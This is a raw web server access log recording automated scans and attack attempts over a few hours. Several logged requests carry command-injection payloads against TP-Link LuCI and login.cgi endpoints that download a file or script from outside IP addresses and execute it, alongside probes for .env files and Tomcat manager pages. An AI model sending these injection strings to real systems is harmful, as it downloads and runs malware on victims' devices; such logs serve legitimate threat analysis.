128.199.137.235 - - [01/May/2024:03:25:58 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
84.54.51.41 - - [01/May/2024:03:26:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
128.199.137.235 - - [01/May/2024:03:26:14 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:26:16 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:26:18 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:26:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:26:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:27:09 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
141.98.11.79 - - [01/May/2024:03:27:47 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
128.199.137.235 - - [01/May/2024:03:28:00 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
128.199.137.235 - - [01/May/2024:03:28:10 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
195.1.144.109 - - [01/May/2024:03:28:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
65.49.1.67 - - [01/May/2024:03:30:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [01/May/2024:03:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.20.67 - - [01/May/2024:03:30:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [01/May/2024:03:35:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.198.6.1 - - [01/May/2024:03:40:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
35.203.211.248 - - [01/May/2024:03:43:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
143.198.6.1 - - [01/May/2024:03:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
143.198.6.1 - - [01/May/2024:03:44:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.83/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
141.98.11.79 - - [01/May/2024:03:48:20 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
54.190.102.213 - - [01/May/2024:03:48:38 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
180.149.125.167 - - [01/May/2024:03:52:14 +0200] "GET /c/ HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
54.193.241.228 - - [01/May/2024:03:58:13 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
78.153.140.179 - - [01/May/2024:03:59:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
167.94.146.57 - - [01/May/2024:04:01:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.57 - - [01/May/2024:04:01:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.57 - - [01/May/2024:04:01:08 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.57 - - [01/May/2024:04:01:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
76.11.185.195 - - [01/May/2024:04:01:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
54.171.183.2 - - [01/May/2024:04:03:43 +0200] "HEAD / HTTP/1.1" 200 - "https://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
18.144.156.52 - - [01/May/2024:04:06:49 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
141.98.11.79 - - [01/May/2024:04:11:06 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
185.180.140.5 - - [01/May/2024:04:19:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.5 - - [01/May/2024:04:19:52 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
78.153.140.177 - - [01/May/2024:04:20:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [01/May/2024:04:20:40 +0200] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
167.94.146.50 - - [01/May/2024:04:24:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.50 - - [01/May/2024:04:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.50 - - [01/May/2024:04:24:14 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.50 - - [01/May/2024:04:24:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.102.60.156 - - [01/May/2024:04:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.24.0"
91.106.75.213 - - [01/May/2024:04:31:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.203.211.92 - - [01/May/2024:04:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
12.208.125.142 - - [01/May/2024:04:41:19 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
12.208.125.142 - - [01/May/2024:04:41:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.179 - - [01/May/2024:04:46:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.179 - - [01/May/2024:04:46:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
89.241.218.180 - - [01/May/2024:04:48:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
198.199.117.94 - - [01/May/2024:04:49:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:49:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:49:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:49:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:49:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:50:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:51:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.117.94 - - [01/May/2024:04:51:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.242.226.10 - - [01/May/2024:04:52:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:04:52:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:04:53:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:04:55:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:04:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
195.1.144.109 - - [01/May/2024:04:59:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.242.226.10 - - [01/May/2024:05:00:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:05:00:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:05:05:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
141.98.11.79 - - [01/May/2024:05:06:04 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
185.242.226.10 - - [01/May/2024:05:06:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [01/May/2024:05:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
103.245.236.120 - - [01/May/2024:05:13:59 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:05:14:01 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
37.139.5.66 - - [01/May/2024:05:18:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
195.1.144.109 - - [01/May/2024:05:18:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
66.240.192.138 - - [01/May/2024:05:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.192.138 - - [01/May/2024:05:23:44 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
66.240.192.138 - - [01/May/2024:05:23:44 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
66.240.192.138 - - [01/May/2024:05:23:45 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
141.98.11.79 - - [01/May/2024:05:23:50 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
66.240.192.138 - - [01/May/2024:05:23:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
195.1.144.109 - - [01/May/2024:05:25:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
164.52.0.94 - - [01/May/2024:05:25:15 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
164.52.0.94 - - [01/May/2024:05:25:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [01/May/2024:05:25:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.52.0.94 - - [01/May/2024:05:25:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [01/May/2024:05:25:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
162.142.125.214 - - [01/May/2024:05:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.214 - - [01/May/2024:05:29:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.214 - - [01/May/2024:05:29:45 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.214 - - [01/May/2024:05:29:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
74.82.47.5 - - [01/May/2024:05:29:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
65.49.20.67 - - [01/May/2024:05:30:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
195.1.144.109 - - [01/May/2024:05:31:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
65.49.20.67 - - [01/May/2024:05:33:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
74.82.47.5 - - [01/May/2024:05:33:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
195.1.144.109 - - [01/May/2024:05:33:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
65.49.20.67 - - [01/May/2024:05:33:42 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
74.82.47.5 - - [01/May/2024:05:33:58 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
195.1.144.109 - - [01/May/2024:05:37:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
152.32.198.168 - - [01/May/2024:05:37:21 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:37:25 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:37:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:37:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:37:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:37:46 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:37:46 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:37:49 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:37:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:37:51 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:37:51 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
195.1.144.109 - - [01/May/2024:05:37:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
152.32.198.168 - - [01/May/2024:05:37:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:38:07 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:38:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:38:14 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:38:14 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:38:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:38:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:38:33 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:38:33 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:39:13 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:39:22 +0200] "\x16\x03\x01\x01\x17\x01" 501 321 "-" "-"
152.32.198.168 - - [01/May/2024:05:39:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:39:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.198.168 - - [01/May/2024:05:39:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:39:38 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.198.168 - - [01/May/2024:05:39:38 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
